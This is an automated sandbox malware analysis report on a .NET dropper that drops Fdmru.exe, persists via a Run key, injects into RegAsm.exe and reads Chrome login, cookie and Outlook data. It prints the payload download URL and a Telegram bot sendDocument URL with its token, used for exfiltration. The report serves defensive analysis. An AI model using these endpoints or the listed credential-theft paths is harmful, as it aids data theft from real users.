                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeQueries volume information: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeQueries volume information: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts1
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services1
                    Archive Collected Data
                    Exfiltration Over Other Network Medium1
                    Web Service
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    PowerShell
                    1
                    Registry Run Keys / Startup Folder
                    11
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    23
                    System Information Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    Exfiltration Over Bluetooth1
                    Ingress Tool Transfer
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)1
                    Registry Run Keys / Startup Folder
                    2
                    Obfuscated Files or Information
                    Security Account Manager211
                    Security Software Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    Automated Exfiltration11
                    Encrypted Channel
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
                    Software Packing
                    NTDS1
                    Process Discovery
                    Distributed Component Object Model1
                    Input Capture
                    Scheduled Transfer3
                    Non-Application Layer Protocol
                    SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Timestomp
                    LSA Secrets21
                    Virtualization/Sandbox Evasion
                    SSHKeyloggingData Transfer Size Limits4
                    Application Layer Protocol
                    Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    DLL Side-Loading
                    Cached Domain Credentials1
                    Application Window Discovery
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                    Masquerading
                    DCSync1
                    Remote System Discovery
                    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job21
                    Virtualization/Sandbox Evasion
                    Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)11
                    Process Injection
                    /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 722938 Sample: SecuriteInfo.com.Win32.Drop... Startdate: 14/10/2022 Architecture: WINDOWS Score: 100 42 Snort IDS alert for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 .NET source code contains potential unpacker 2->46 48 4 other signatures 2->48 7 SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe 16 7 2->7         started        12 Fdmru.exe 14 2 2->12         started        14 Fdmru.exe 2 2->14         started        process3 dnsIp4 36 41.216.183.235, 49699, 49700, 49701 AS40676US South Africa 7->36 28 C:\Users\user\AppData\Roaming\...\Fdmru.exe, PE32 7->28 dropped 30 C:\Users\user\...\Fdmru.exe:Zone.Identifier, ASCII 7->30 dropped 32 SecuriteInfo.com.W...n.785.24355.exe.log, ASCII 7->32 dropped 50 Encrypted powershell cmdline option found 7->50 16 RegAsm.exe 14 14 7->16         started        20 powershell.exe 16 7->20         started        22 RegAsm.exe 7->22         started        24 RegAsm.exe 7->24         started        52 Multi AV Scanner detection for dropped file 12->52 54 Machine Learning detection for dropped file 12->54 file5 signatures6 process7 dnsIp8 34 api.telegram.org 149.154.167.220 TELEGRAMRU United Kingdom 16->34 38 Tries to steal Mail credentials (via file / registry access) 16->38 40 Tries to harvest and steal browser information (history, passwords, etc) 16->40 26 conhost.exe 20->26         started        signatures9 process10

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    No bigger version

                    windows-stand
                    SourceDetectionScannerLabelLink
                    SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe22%VirustotalBrowse
                    SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe22%VirustotalBrowse
                    SourceDetectionScannerLabelLinkDownload
                    16.0.RegAsm.exe.400000.0.unpack100%AviraHEUR/AGEN.1235897Download File
                    18.3.Fdmru.exe.764bf14.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://james.newtonking.com/projects/json0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://41.216.183.235/Fppsmppzh.png0%Avira URL Cloudsafe
                    https://api.telegram.org48k0%Avira URL Cloudsafe
                    http://41.216.183.235/Fppsmppzh.png0%VirustotalBrowse
                    https://vectorstealer.com0%VirustotalBrowse
                    https://vectorstealer.com0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.telegram.org
                    149.154.167.220
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      http://41.216.183.235/Fppsmppzh.pngtrue
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.telegram.org/bot5796425317:AAHM7r2yEwXDuHWfXY8KETRrxlUeHemQZEo/sendDocumentfalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabRegAsm.exe, 00000010.00000003.584797810.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.788716199.0000000004AE8000.00000004.00000800.00020000.00000000.sdmp, tmp3DB7.tmp.tmpdb.16.drfalse
                          high
                          http://www.fontbureau.com/designersGSecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://duckduckgo.com/ac/?q=tmp3DB7.tmp.tmpdb.16.drfalse
                              high
                              http://www.fontbureau.com/designers/?SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.founder.com.cn/cn/bTheSecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://api.telegram.orgRegAsm.exe, 00000010.00000002.627767607.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.640544728.0000000002F5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org/botSecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.581149439.0000000007E04000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.569512318.0000000007C11000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.620597742.0000000002D22000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.fontbureau.com/designers?SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://search.yahoo.com?fr=crmas_sfpfRegAsm.exe, 00000010.00000003.584797810.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.788716199.0000000004AE8000.00000004.00000800.00020000.00000000.sdmp, tmp3DB7.tmp.tmpdb.16.drfalse
                                        high
                                        http://www.tiro.comSecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        https://www.newtonsoft.com/jsonSecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.fontbureau.com/designersSecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.goodfont.co.krSecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.sajatypeworks.comSecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.typography.netDSecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.founder.com.cn/cn/cTheSecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://api.telegram.org48kRegAsm.exe, 00000010.00000002.627767607.0000000002E4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.galapagosdesign.com/staff/dennis.htmSecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://fontfabrik.comSecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.galapagosdesign.com/DPleaseSecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fonts.comSecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.sandoll.co.krSecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.urwpp.deDPleaseSecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.zhongyicts.com.cnSecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://vectorstealer.comRegAsm.exe, 00000010.00000002.620597742.0000000002D22000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.503779743.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.627767607.0000000002E4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.sakkal.comSecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://github.com/JamesNK/Newtonsoft.JsonRegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.apache.org/licenses/LICENSE-2.0SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.fontbureau.comSecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://api.telegram.org/bot5796425317:AAHM7r2yEwXDuHWfXY8KETRrxlUeHemQZEo/sendDocumentHRegAsm.exe, 00000010.00000002.627767607.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.640544728.0000000002F5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegAsm.exe, 00000010.00000003.584797810.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.788716199.0000000004AE8000.00000004.00000800.00020000.00000000.sdmp, tmp3DB7.tmp.tmpdb.16.drfalse
                                                          high
                                                          https://api.telegram.org/bot5796425317:AAHM7r2yEwXDuHWfXY8KETRrxlUeHemQZEo/sendDocumentPRegAsm.exe, 00000010.00000002.627767607.0000000002E4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmp3DB7.tmp.tmpdb.16.drfalse
                                                              high
                                                              https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchRegAsm.exe, 00000010.00000003.584797810.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.788716199.0000000004AE8000.00000004.00000800.00020000.00000000.sdmp, tmp3DB7.tmp.tmpdb.16.drfalse
                                                                high
                                                                https://api.telegram.org/botHRegAsm.exe, 00000010.00000002.639930266.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.627767607.0000000002E4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=RegAsm.exe, 00000010.00000003.584797810.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.788716199.0000000004AE8000.00000004.00000800.00020000.00000000.sdmp, tmp3DB7.tmp.tmpdb.16.drfalse
                                                                    high
                                                                    http://james.newtonking.com/projects/jsonRegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.carterandcone.comlSecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://ac.ecosia.org/autocomplete?q=tmp3DB7.tmp.tmpdb.16.drfalse
                                                                      high
                                                                      https://search.yahoo.com?fr=crmas_sfpRegAsm.exe, 00000010.00000003.584797810.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.788716199.0000000004AE8000.00000004.00000800.00020000.00000000.sdmp, tmp3DB7.tmp.tmpdb.16.drfalse
                                                                        high
                                                                        http://www.fontbureau.com/designers/cabarga.htmlNSecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.founder.com.cn/cnSecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.fontbureau.com/designers/frere-jones.htmlSecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.jiyu-kobo.co.jp/SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://www.newtonsoft.com/jsonschemaRegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.fontbureau.com/designers8SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.nuget.org/packages/Newtonsoft.Json.BsonSecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://api.telegram.orgRegAsm.exe, 00000010.00000002.627767607.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.638281280.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.640544728.0000000002F5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://github.com/novotnyllc/bc-csharpRegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmp3DB7.tmp.tmpdb.16.drfalse
                                                                                        high
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        149.154.167.220
                                                                                        api.telegram.orgUnited Kingdom
                                                                                        62041TELEGRAMRUfalse
                                                                                        41.216.183.235
                                                                                        unknownSouth Africa
                                                                                        40676AS40676UStrue
                                                                                        Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                        Analysis ID:722938
                                                                                        Start date and time:2022-10-14 00:41:27 +02:00
                                                                                        Joe Sandbox Product:CloudBasic
                                                                                        Overall analysis duration:0h 11m 5s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:light
                                                                                        Sample file name:SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                        Number of analysed new started processes analysed:22
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • HDC enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@12/14@3/2
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        HDC Information:Failed
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        • Number of executed functions: 0
                                                                                        • Number of non-executed functions: 0
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Override analysis time to 240s for sample files taking high CPU consumption
                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                        • TCP Packets have been reduced to 100
                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size exceeded maximum capacity and may have missing network information.
                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        TimeTypeDescription
                                                                                        00:43:13API Interceptor13x Sleep call for process: powershell.exe modified
                                                                                        00:44:18AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Fdmru "C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe"
                                                                                        00:44:19API Interceptor1x Sleep call for process: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe modified
                                                                                        00:44:26AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Fdmru "C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe"
                                                                                        00:45:04API Interceptor20x Sleep call for process: RegAsm.exe modified
                                                                                        No context
                                                                                        No context
                                                                                        No context
                                                                                        No context
                                                                                        No context
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1771
                                                                                        Entropy (8bit):5.36045869097821
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:MxHKXwYHKhQnoPtHoxHhAHKzv7HLHKdHKBqHK9HK+HKoHK:iqXwYqhQnoPtIxHeqzjrqdq4q9q+qoq
                                                                                        MD5:CD8B08BBE2E11245DC9823F26E788A41
                                                                                        SHA1:76D0BA219B53C1FBB53BA6550671CBA76A59EC48
                                                                                        SHA-256:39F474523EF6F62C60D56AEDFAB8621231C68F87A72E9964C1BEAC375CD248CA
                                                                                        SHA-512:D969E60E90E62D8392C8CA5E8DA7094FD03640F20C1CD8C262B791F5030E1C6BEA106B5A770375AE322C9DD933B5CC30D32D3E6F5D09FD51BA9FEC63E8D4E29C
                                                                                        Malicious:false
                                                                                        Reputation:low
